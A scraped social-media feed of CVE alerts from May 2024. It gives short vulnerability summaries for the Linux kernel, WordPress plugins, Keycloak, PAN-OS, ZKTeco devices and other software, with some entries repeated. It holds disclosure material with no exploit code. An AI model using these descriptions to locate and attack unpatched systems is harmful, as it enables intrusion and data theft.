ones.🎖@cveNotify |
|
| 2024-05-22 07:37:25 |
🚨 CVE-2021-47434In the Linux kernel, the following vulnerability has been resolved:xhci: Fix command ring pointer corruption while aborting a commandThe command ring pointer is located at [6:63] bits of the commandring control register (CRCR). All the control bits like command stop,abort are located at [0:3] bits. While aborting a command, we read theCRCR and set the abort bit and write to the CRCR. The read will alwaysgive command ring pointer as all zeros. So we essentially write onlythe control bits. Since we split the 64 bit write into two 32 bit writes,there is a possibility of xHC command ring stopped before the upperdword (all zeros) is written. If that happens, xHC updates the upperdword of its internal command ring pointer with all zeros. Next time,when the command ring is restarted, we see xHC memory access failures.Fix this issue by only writing to the lower dword of CRCR where allcontrol bits are located.🎖@cveNotify |
|
| 2024-05-22 07:37:24 |
🚨 CVE-2021-47433In the Linux kernel, the following vulnerability has been resolved:btrfs: fix abort logic in btrfs_replace_file_extentsError injection testing uncovered a case where we'd end up with acorrupt file system with a missing extent in the middle of a file. Thisoccurs because the if statement to decide if we should abort is wrong.The only way we would abort in this case is if we got a ret !=-EOPNOTSUPP and we called from the file clone code. However theprealloc code uses this path too. Instead we need to abort if there isan error, and the only error we _don't_ abort on is -EOPNOTSUPP and onlyif we came from the clone file code.🎖@cveNotify |
|
| 2024-05-22 06:37:31 |
🚨 CVE-2024-5092The Elegant Addons for elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Switcher, Slider, and Iconbox widgets in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-22 06:37:30 |
🚨 CVE-2024-4443The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-05-22 06:37:26 |
🚨 CVE-2024-3611The Toolbar Extras for Elementor & More – WordPress Admin Bar Enhanced plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tbex-version' shortcode in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-22 06:37:25 |
🚨 CVE-2024-31340TP-Link Tether versions prior to 4.5.13 and TP-Link Tapo versions prior to 3.3.6 do not properly validate certificates, which may allow a remote unauthenticated attacker to eavesdrop on an encrypted communication via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-05-22 06:37:24 |
🚨 CVE-2020-35165Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Observable Timing Discrepancy Vulnerability.🎖@cveNotify |
|
| 2024-05-22 05:37:30 |
🚨 CVE-2024-4980The WPKoi Templates for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'id', 'mixColor', 'backgroundColor', 'saveInCookies', and 'autoMatchOsTheme' parameters in all versions up to, and including, 2.5.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-22 05:37:26 |
🚨 CVE-2024-31395Cross-site scripting vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.12, Ver.3.0.x series versions prior to Ver.3.0.32, Ver.2.11.x series versions prior to Ver.2.11.61, Ver.2.10.x series versions prior to Ver.2.10.53, and Ver.2.9 and earlier versions. If this vulnerability is exploited, a user with an editor or higher privilege who can log in to the product may execute an arbitrary script on the web browser of the user who accessed the schedule management page.🎖@cveNotify |
|
| 2024-05-22 05:37:25 |
🚨 CVE-2024-30420Server-side request forgery (SSRF) vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.12 and Ver.3.0.x series versions prior to Ver.3.0.32. If this vulnerability is exploited, a user with an administrator or higher privilege who can log in to the product may obtain arbitrary files on the server and information on the internal server that is not disclosed to the public.🎖@cveNotify |
|
| 2024-05-22 05:37:24 |
🚨 CVE-2024-30419Cross-site scripting vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.12, Ver.3.0.x series versions prior to Ver.3.0.32, Ver.2.11.x series versions prior to Ver.2.11.61, Ver.2.10.x series versions prior to Ver.2.10.53, and Ver.2.9 and earlier versions. If this vulnerability is exploited, a user with a contributor or higher privilege who can log in to the product may execute an arbitrary script on the web browser of the user who accessed the website using the product.🎖@cveNotify |
|
| 2024-05-22 04:37:54 |
🚨 CVE-2024-0453The AI ChatBot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the openai_file_delete_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete files from a linked OpenAI account.🎖@cveNotify |
|
| 2024-05-22 04:37:53 |
🚨 CVE-2024-0451The AI ChatBot plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the openai_file_list_callback function in all versions up to, and including, 5.3.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to list files existing in a linked OpenAI account.🎖@cveNotify |
|
| 2024-05-22 00:37:25 |
🚨 CVE-2024-3519The Media Library Assistant plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the lang parameter in all versions up to, and including, 3.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-22 00:37:24 |
🚨 CVE-2024-3518The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode(s) in all versions up to, and including, 3.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-05-21 23:37:24 |
🚨 CVE-2024-21683This High severity RCE (Remote Code Execution) vulnerability was introduced in version 5.2 of Confluence Data Center and Server.This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 8.3, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions. See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.htmlYou can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives.This vulnerability was found internally.🎖@cveNotify |
|
| 2024-05-21 22:37:24 |
🚨 CVE-2022-26635PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection. Note: Third parties have disputed this as not affecting PHP-Memcached directly.🎖@cveNotify |
|
| 2024-05-21 21:37:25 |
🚨 CVE-2024-5040There are multiple ways in LCDS LAquis SCADA for an attacker to access locations outside of their own directory.🎖@cveNotify |
|
| 2024-05-21 21:37:24 |
🚨 CVE-2024-35220@fastify/session is a session plugin for fastify. Requires the @fastify/cookie plugin. When restoring the cookie from the session store, the `expires` field is overriden if the `maxAge` field was set.This means a cookie is never correctly detected as expired and thus expired sessions are not destroyed. This vulnerability has been patched 10.8.0.🎖@cveNotify |
|
| 2024-05-21 20:37:25 |
🚨 CVE-2024-31756An issue in MarvinTest Solutions Hardware Access Driver v.5.0.3.0 and before and fixed in v.5.0.4.0 allows a local attacker to escalate privileges via the Hw65.sys component.🎖@cveNotify |
|
| 2024-05-21 20:37:24 |
🚨 CVE-2024-36076Cross-Site WebSocket Hijacking in SysReptor from version 2024.28 to version 2024.30 causes attackers to escalate privileges and obtain sensitive information when a logged-in SysReptor user visits a malicious same-site subdomain in the same browser session.🎖@cveNotify |
|
| 2024-05-21 19:37:32 |
🚨 CVE-2024-35061NASA AIT-Core v2.5.2 was discovered to use unencrypted channels to exchange data over the network, allowing attackers to execute a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-05-21 19:37:31 |
🚨 CVE-2024-35059An issue in the Pickle Python library of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary commands.🎖@cveNotify |
|
| 2024-05-21 19:37:30 |
🚨 CVE-2024-33525A Stored Cross-site Scripting (XSS) vulnerability in the "Import of organizational units and title of organizational unit" feature in ILIAS 7.20 to 7.30 and ILIAS 8.4 to 8.10 as well as ILIAS 9.0 allows remote authenticated attackers with administrative privileges to inject arbitrary web script or HTML via XML file upload.🎖@cveNotify |
|
| 2024-05-21 19:37:26 |
🚨 CVE-2024-25724In RTI Connext Professional 5.3.1 through 6.1.0 before 6.1.1, a buffer overflow in XML parsing from Routing Service, Recording Service, Queuing Service, and Cloud Discovery Service allows attackers to execute code with the affected service's privileges, compromise the service's integrity, leak sensitive information, or crash the service. These attacks could be done via a remote malicious RTPS message; a compromised call with malicious parameters to the RTI_RoutingService_new, rti::recording::Service, RTI_QueuingService_new, or RTI_CDS_Service_new public APIs; or a compromised local file system containing a malicious XML file.🎖@cveNotify |
|
| 2024-05-21 19:37:25 |
🚨 CVE-2024-34257TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.🎖@cveNotify |
|
| 2024-05-21 19:37:24 |
🚨 CVE-2024-22354IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.5 are vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information, consume memory resources, or to conduct a server-side request forgery attack. IBM X-Force ID: 280401.🎖@cveNotify |
|
| 2024-05-21 18:37:36 |
🚨 CVE-2024-4154In lunary-ai/lunary version 1.2.2, an incorrect synchronization vulnerability allows unprivileged users to rename projects they do not have access to. Specifically, an unprivileged user can send a PATCH request to the project's endpoint with a new name for a project, despite not having the necessary permissions or being assigned to the project. This issue allows for unauthorized modification of project names, potentially leading to confusion or unauthorized access to project resources.🎖@cveNotify |
|
| 2024-05-21 18:37:32 |
🚨 CVE-2024-35058An issue in the API wait function of NASA AIT-Core v2.5.2 allows attackers to execute arbitrary code via supplying a crafted string.🎖@cveNotify |
|
| 2024-05-21 18:37:31 |
🚨 CVE-2024-34240QDOCS Smart School 7.0.0 is vulnerable to Cross Site Scripting (XSS) resulting in arbitrary code execution in admin functions related to adding or updating records.🎖@cveNotify |
|
| 2024-05-21 18:37:30 |
🚨 CVE-2024-31757An issue in TeraByte Unlimited Image for Windows v.3.64.0.0 and before and fixed in v.4.0.0.0 allows a local attacker to escalate privileges via the TBOFLHelper64.sys and TBOFLHelper.sys component.🎖@cveNotify |
|
| 2024-05-21 18:37:26 |
🚨 CVE-2024-22274The vCenter Server contains an authenticated remote code execution vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to run arbitrary commands on the underlying operating system.🎖@cveNotify |
|
| 2024-05-21 18:37:25 |
🚨 CVE-2024-1249A flaw was found in Keycloak's OIDC component in the "checkLoginIframe," which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.🎖@cveNotify |
|
| 2024-05-21 18:37:24 |
🚨 CVE-2024-1132A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. This issue could allow an attacker to construct a malicious request to bypass validation and access other URLs and sensitive information within the domain or conduct further attacks. This flaw affects any client that utilizes a wildcard in the Valid Redirect URIs field, and requires user interaction within the malicious URL.🎖@cveNotify |
|
| 2024-05-21 17:37:31 |
🚨 CVE-2024-33901Issue in KeePassXC 2.7.7 allows an attacker (who has the privileges of the victim) to recover some passwords stored in the .kdbx database via a memory dump. NOTE: the vendor disputes this because memory-management constraints make this unavoidable in the current design and other realistic designs.🎖@cveNotify |
|
| 2024-05-21 17:37:27 |
🚨 CVE-2024-33900KeePassXC 2.7.7 allows an attacker (who has the privileges of the victim) to recover cleartext credentials via a memory dump. NOTE: the vendor disputes this because memory-management constraints make this unavoidable in the current design and other realistic designs.🎖@cveNotify |
|
| 2024-05-21 17:37:26 |
🚨 CVE-2023-6717A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.🎖@cveNotify |
|
| 2024-05-21 17:37:25 |
🚨 CVE-2024-3400A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.🎖@cveNotify |
|
| 2024-05-21 17:37:24 |
🚨 CVE-2023-24163SQL Inection vulnerability in Dromara hutool before 5.8.21 allows attacker to execute arbitrary code via the aviator template engine.🎖@cveNotify |
|
| 2024-05-21 17:07:38 |
🚨 CVE-2021-47220In the Linux kernel, the following vulnerability has been resolved:usb: dwc3: core: fix kernel panic when do rebootWhen do system reboot, it calls dwc3_shutdown and the whole debugfsfor dwc3 has removed first, when the gadget tries to do deinit, andremove debugfs for its endpoints, it meets NULL pointer dereferenceissue when call debugfs_lookup. Fix it by removing the whole dwc3debugfs later than dwc3_drd_exit.[ 2924.958838] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000002....[ 2925.030994] pstate: 60000005 (nZCv daif -PAN -UAO -TCO BTYPE=--)[ 2925.037005] pc : inode_permission+0x2c/0x198[ 2925.041281] lr : lookup_one_len_common+0xb0/0xf8[ 2925.045903] sp : ffff80001276ba70[ 2925.049218] x29: ffff80001276ba70 x28: ffff0000c01f0000 x27: 0000000000000000[ 2925.056364] x26: ffff800011791e70 x25: 0000000000000008 x24: dead000000000100[ 2925.063510] x23: dead000000000122 x22: 0000000000000000 x21: 0000000000000001[ 2925.070652] x20: ffff8000122c6188 x19: 0000000000000000 x18: 0000000000000000[ 2925.077797] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000004[ 2925.084943] x14: ffffffffffffffff x13: 0000000000000000 x12: 0000000000000030[ 2925.092087] x11: 0101010101010101 x10: 7f7f7f7f7f7f7f7f x9 : ffff8000102b2420[ 2925.099232] x8 : 7f7f7f7f7f7f7f7f x7 : feff73746e2f6f64 x6 : 0000000000008080[ 2925.106378] x5 : 61c8864680b583eb x4 : 209e6ec2d263dbb7 x3 : 000074756f307065[ 2925.113523] x2 : 0000000000000001 x1 : 0000000000000000 x0 : ffff8000122c6188[ 2925.120671] Call trace:[ 2925.123119] inode_permission+0x2c/0x198[ 2925.127042] lookup_one_len_common+0xb0/0xf8[ 2925.131315] lookup_one_len_unlocked+0x34/0xb0[ 2925.135764] lookup_positive_unlocked+0x14/0x50[ 2925.140296] debugfs_lookup+0x68/0xa0[ 2925.143964] dwc3_gadget_free_endpoints+0x84/0xb0[ 2925.148675] dwc3_gadget_exit+0x28/0x78[ 2925.152518] dwc3_drd_exit+0x100/0x1f8[ 2925.156267] dwc3_remove+0x11c/0x120[ 2925.159851] dwc3_shutdown+0x14/0x20[ 2925.163432] platform_shutdown+0x28/0x38[ 2925.167360] device_shutdown+0x15c/0x378[ 2925.171291] kernel_restart_prepare+0x3c/0x48[ 2925.175650] kernel_restart+0x1c/0x68[ 2925.179316] __do_sys_reboot+0x218/0x240[ 2925.183247] __arm64_sys_reboot+0x28/0x30[ 2925.187262] invoke_syscall+0x48/0x100[ 2925.191017] el0_svc_common.constprop.0+0x48/0xc8[ 2925.195726] do_el0_svc+0x28/0x88[ 2925.199045] el0_svc+0x20/0x30[ 2925.202104] el0_sync_handler+0xa8/0xb0[ 2925.205942] el0_sync+0x148/0x180[ 2925.209270] Code: a9025bf5 2a0203f5 121f0056 370802b5 (79400660)[ 2925.215372] ---[ end trace 124254d8e485a58b ]---[ 2925.220012] Kernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b[ 2925.227676] Kernel Offset: disabled[ 2925.231164] CPU features: 0x00001001,20000846[ 2925.235521] Memory Limit: none[ 2925.238580] ---[ end Kernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b ]---(cherry picked from commit 2a042767814bd0edf2619f06fecd374e266ea068)🎖@cveNotify |
|
| 2024-05-21 17:07:37 |
🚨 CVE-2020-36788In the Linux kernel, the following vulnerability has been resolved:drm/nouveau: avoid a use-after-free when BO init failsnouveau_bo_init() is backed by ttm_bo_init() and ferries its return codeback to the caller. On failures, ttm_bo_init() invokes the provideddestructor which should de-initialize and free the memory.Thus, when nouveau_bo_init() returns an error the gem object has alreadybeen released and the memory freed by nouveau_bo_del_ttm().🎖@cveNotify |
|
| 2024-05-21 17:07:33 |
🚨 CVE-2024-4452The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter in versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-21 17:07:32 |
🚨 CVE-2024-35385An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_mk_ffi_sig function in the mjs.c file.🎖@cveNotify |
|
| 2024-05-21 17:07:31 |
🚨 CVE-2024-35218Umbraco CMS is an ASP.NET CMS used by more than 730.000 websites. Stored Cross-site scripting (XSS) enable attackers that have access to backoffice to bring malicious content into a website or application. This vulnerability has been patched in version(s) 8.18.13, 10.8.4, 12.3.7, 13.1.1 by implementing IHtmlSanitizer.🎖@cveNotify |
|
| 2024-05-21 17:07:27 |
🚨 CVE-2024-34071Umbraco is an ASP.NET CMS used by more than 730.000 websites. Umbraco has an endpoint that is vulnerable to open redirects. The endpoint is protected so it requires the user to be signed into backoffice before the vulnerable is exposed. This vulnerability has been patched in version(s) 8.18.14, 10.8.6, 12.3.10 and 13.3.1.🎖@cveNotify |
|
| 2024-05-21 17:07:26 |
🚨 CVE-2024-35361MTab Bookmark v1.9.5 has an SQL injection vulnerability in /LinkStore/getIcon. An attacker can execute arbitrary SQL statements through this vulnerability without requiring any user rights.🎖@cveNotify |
|
| 2024-05-21 17:07:25 |
🚨 CVE-2023-3942An 'SQL Injection' vulnerability, due to improper neutralization of special elements used in SQL commands, exists in ZKTeco-based OEM devices. This vulnerability allows an attacker to, in some cases, impersonate another user or perform unauthorized actions. In other instances, it enables the attacker to access user data and system parameters from the database.This issue affects ZkTeco-based OEM devices (ZkTeco ProFace X, Smartec ST-FR043, Smartec ST-FR041ME and possibly others) with firmware ZAM170-NF-1.8.25-7354-Ver1.0.0 and possibly other, Standalone service v. 2.1.6-20200907 and possibly others.🎖@cveNotify |
|
| 2024-05-21 16:37:31 |
🚨 CVE-2022-48710In the Linux kernel, the following vulnerability has been resolved:drm/radeon: fix a possible null pointer dereferenceIn radeon_fp_native_mode(), the return value of drm_mode_duplicate()is assigned to mode, which will lead to a NULL pointer dereferenceon failure of drm_mode_duplicate(). Add a check to avoid npd.The failure status of drm_cvt_mode() on the other path is checked too.🎖@cveNotify |
|
| 2024-05-21 16:37:27 |
🚨 CVE-2022-48709In the Linux kernel, the following vulnerability has been resolved:ice: switch: fix potential memleak in ice_add_adv_recipe()When ice_add_special_words() fails, the 'rm' is not released, which willlead to a memory leak. Fix this up by going to 'err_unroll' label.Compile tested only.🎖@cveNotify |
|
| 2024-05-21 16:37:26 |
🚨 CVE-2022-48707In the Linux kernel, the following vulnerability has been resolved:cxl/region: Fix null pointer dereference for resetting decoderNot all decoders have a reset callback.The CXL specification allows a host bridge with a single root port tohave no explicit HDM decoders. Currently the region driver assumes thereare none. As such the CXL core creates a special pass through decoderinstance without a commit/reset callback.Prior to this patch, the ->reset() callback was called unconditionally whencalling cxl_region_decode_reset. Thus a configuration with 1 Host Bridge,1 Root Port, and one directly attached CXL type 3 device or multiple CXLtype 3 devices attached to downstream ports of a switch can cause a nullpointer dereference.Before the fix, a kernel crash was observed when we destroy the region, anda pass through decoder is reset.The issue can be reproduced as below, 1) create a region with a CXL setup which includes a HB with a single root port under which a memdev is attached directly. 2) destroy the region with cxl destroy-region regionX -f.🎖@cveNotify |
|
| 2024-05-21 16:37:25 |
🚨 CVE-2021-47432In the Linux kernel, the following vulnerability has been resolved:lib/generic-radix-tree.c: Don't overflow in peek()When we started spreading new inode numbers throughout most of the 64bit inode space, that triggered some corner case bugs, in particularsome integer overflows related to the radix tree code. Oops.🎖@cveNotify |
|
| 2024-05-21 14:37:50 |
🚨 CVE-2024-4452The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter in versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-21 14:37:46 |
🚨 CVE-2024-35386An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_do_gc function in the mjs.c file.🎖@cveNotify |
|
| 2024-05-21 14:37:45 |
🚨 CVE-2024-35218Umbraco CMS is an ASP.NET CMS used by more than 730.000 websites. Stored Cross-site scripting (XSS) enable attackers that have access to backoffice to bring malicious content into a website or application. This vulnerability has been patched in version(s) 8.18.13, 10.8.4, 12.3.7, 13.1.1 by implementing IHtmlSanitizer.🎖@cveNotify |
|
| 2024-05-21 14:37:44 |
🚨 CVE-2024-34071Umbraco is an ASP.NET CMS used by more than 730.000 websites. Umbraco has an endpoint that is vulnerable to open redirects. The endpoint is protected so it requires the user to be signed into backoffice before the vulnerable is exposed. This vulnerability has been patched in version(s) 8.18.14, 10.8.6, 12.3.10 and 13.3.1.🎖@cveNotify |
|
| 2024-05-21 14:37:40 |
🚨 CVE-2023-3943Stack-based Buffer Overflow vulnerability in ZkTeco-based OEM devices allows, in some cases, the execution of arbitrary code. Due to the lack of protection mechanisms such as stack canaries and PIE, it is possible to successfully execute code even under restrictive conditions.This issue affects ZkTeco-based OEM devices (ZkTeco ProFace X, Smartec ST-FR043, Smartec ST-FR041ME and possibly others) with firmware ZAM170-NF-1.8.25-7354-Ver1.0.0 and possibly others.🎖@cveNotify |
|
| 2024-05-21 14:37:39 |
🚨 CVE-2021-29097Multiple buffer overflow vulnerabilities when parsing a specially crafted file in Esri ArcReader, ArcGIS Desktop, ArcGIS Engine 10.8.1 (and earlier) and ArcGIS Pro 2.7 (and earlier) allow an unauthenticated attacker to achieve arbitrary code execution in the context of the current user.🎖@cveNotify |
|
| 2024-05-21 14:37:38 |
🚨 CVE-2021-29096A use-after-free vulnerability when parsing a specially crafted file in Esri ArcReader, ArcGIS Desktop, ArcGIS Engine 10.8.1 (and earlier) and ArcGIS Pro 2.7 (and earlier) allows an unauthenticated attacker to achieve arbitrary code execution in the context of the current user.🎖@cveNotify |
|
| 2024-05-21 13:37:26 |
🚨 CVE-2024-35361MTab Bookmark v1.9.5 has an SQL injection vulnerability in /LinkStore/getIcon. An attacker can execute arbitrary SQL statements through this vulnerability without requiring any user rights.🎖@cveNotify |
|
| 2024-05-21 13:37:25 |
🚨 CVE-2023-3942An 'SQL Injection' vulnerability, due to improper neutralization of special elements used in SQL commands, exists in ZKTeco-based OEM devices. This vulnerability allows an attacker to, in some cases, impersonate another user or perform unauthorized actions. In other instances, it enables the attacker to access user data and system parameters from the database.This issue affects ZkTeco-based OEM devices (ZkTeco ProFace X, Smartec ST-FR043, Smartec ST-FR041ME and possibly others) with firmware ZAM170-NF-1.8.25-7354-Ver1.0.0 and possibly other, Standalone service v. 2.1.6-20200907 and possibly others.🎖@cveNotify |
|
| 2024-05-21 13:37:24 |
🚨 CVE-2023-25838There is SQL injection vulnerability in Esri ArcGIS Insights 2022.1 for ArcGIS Enterprise and that may allow a remote, authorized attacker to execute arbitrary SQL commands against the back-end database. The effort required to generate the crafted input required to exploit this issue is complex and requires significant effort before a successful attack can be expected.🎖@cveNotify |
|
| 2024-05-21 13:07:44 |
🚨 CVE-2024-4470The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ms_slide_info' shortcode in all versions up to, and including, 3.9.9 due to insufficient input sanitization and output escaping on user supplied 'tag_name' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-21 13:07:43 |
🚨 CVE-2024-4372The Carousel Slider WordPress plugin before 2.2.11 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-05-21 13:07:42 |
🚨 CVE-2024-4289The Sailthru Triggermail WordPress plugin through 1.1 does not sanitise and escape various parameters before outputting them back in pages and attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-05-21 13:07:38 |
🚨 CVE-2024-2189The Social Icons Widget & Block by WPZOOM WordPress plugin before 4.2.18 does not sanitise and escape some of its Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-21 13:07:37 |
🚨 CVE-2024-0816The buffer overflow vulnerability in the DX3300-T1 firmware version V5.50(ABVY.4)C0 could allow an authenticated local attacker to cause denial of service (DoS) conditions by executing the CLI command with crafted strings on an affected device.🎖@cveNotify |
|
| 2024-05-21 13:07:32 |
🚨 CVE-2024-5145A vulnerability was found in SourceCodester Vehicle Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file /newdriver.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265289 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-21 13:07:31 |
🚨 CVE-2024-4985An authentication bypass vulnerability was present in the GitHub Enterprise Server (GHES) when utilizing SAML single sign-on authentication with the optional encrypted assertions feature. This vulnerability allowed an attacker to forge a SAML response to provision and/or gain access to a user with site administrator privileges. Exploitation of this vulnerability would allow unauthorized access to the instance without requiring prior authentication. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.13.0 and was fixed in versions 3.9.15, 3.10.12, 3.11.10 and 3.12.4. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-05-21 13:07:30 |
🚨 CVE-2024-35195Requests is a HTTP library. Prior to 2.32.0, when making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same host will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool. This vulnerability is fixed in 2.32.0.🎖@cveNotify |
|
| 2024-05-21 13:07:26 |
🚨 CVE-2024-35191Formie is a Craft CMS plugin for creating forms. Prior to 2.1.6, users with access to a form's settings can include malicious Twig code into fields that support Twig. These might be the Submission Title or the Success Message. This code will then be executed upon creating a submission, or rendering the text. This has been fixed in Formie 2.1.6.🎖@cveNotify |
|
| 2024-05-21 13:07:25 |
🚨 CVE-2024-33901Issue in KeePassXC 2.7.7 allows an attacker to recover some passwords stored in the .kdbx database.🎖@cveNotify |
|
| 2024-05-21 13:07:24 |
🚨 CVE-2024-33900KeePassXC 2.7.7 allows attackers to recover cleartext credentials.🎖@cveNotify |
|
| 2024-05-21 11:37:42 |
🚨 CVE-2024-4619The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the ‘hover_animation’ parameter in versions up to, and including, 3.21.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-21 11:37:38 |
🚨 CVE-2023-3941Relative Path Traversal vulnerability in ZkTeco-based OEM devices allows an attacker to write any file on the system with root privileges.This issue affects ZkTeco-based OEM devices (ZkTeco ProFace X, Smartec ST-FR043, Smartec ST-FR041ME and possibly others) with the ZAM170-NF-1.8.25-7354-Ver1.0.0 and possibly others.🎖@cveNotify |
|
| 2024-05-21 11:37:37 |
🚨 CVE-2023-3939Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in ZkTeco-based OEM devices allows OS Command Injection. Since all the found command implementations are executed from the superuser, their impact is the maximum possible.This issue affects ZkTeco-based OEM devices (ZkTeco ProFace X, Smartec ST-FR043, Smartec ST-FR041ME and possibly others) with the ZAM170-NF-1.8.25-7354-Ver1.0.0 and possibly other.🎖@cveNotify |
|
| 2024-05-21 11:37:36 |
🚨 CVE-2023-3938Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ZkTeco-based OEM devices allows an attacker to authenticate under any user from the device database.This issue affects ZkTeco-based OEM devices (ZkTeco ProFace X, Smartec ST-FR043, Smartec ST-FR041ME and possibly others) with the ZAM170-NF-1.8.25-7354-Ver1.0.0 and possibly others.🎖@cveNotify |
|
| 2024-05-21 10:38:12 |
🚨 CVE-2023-3938Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ZkTeco-based OEM devices allows an attacker to authenticate under any user from the device database.This issue affects ZkTeco-based OEM devices with firmware ZAM170-NF-1.8.25 and possibly others🎖@cveNotify |
|
| 2024-05-21 10:38:11 |
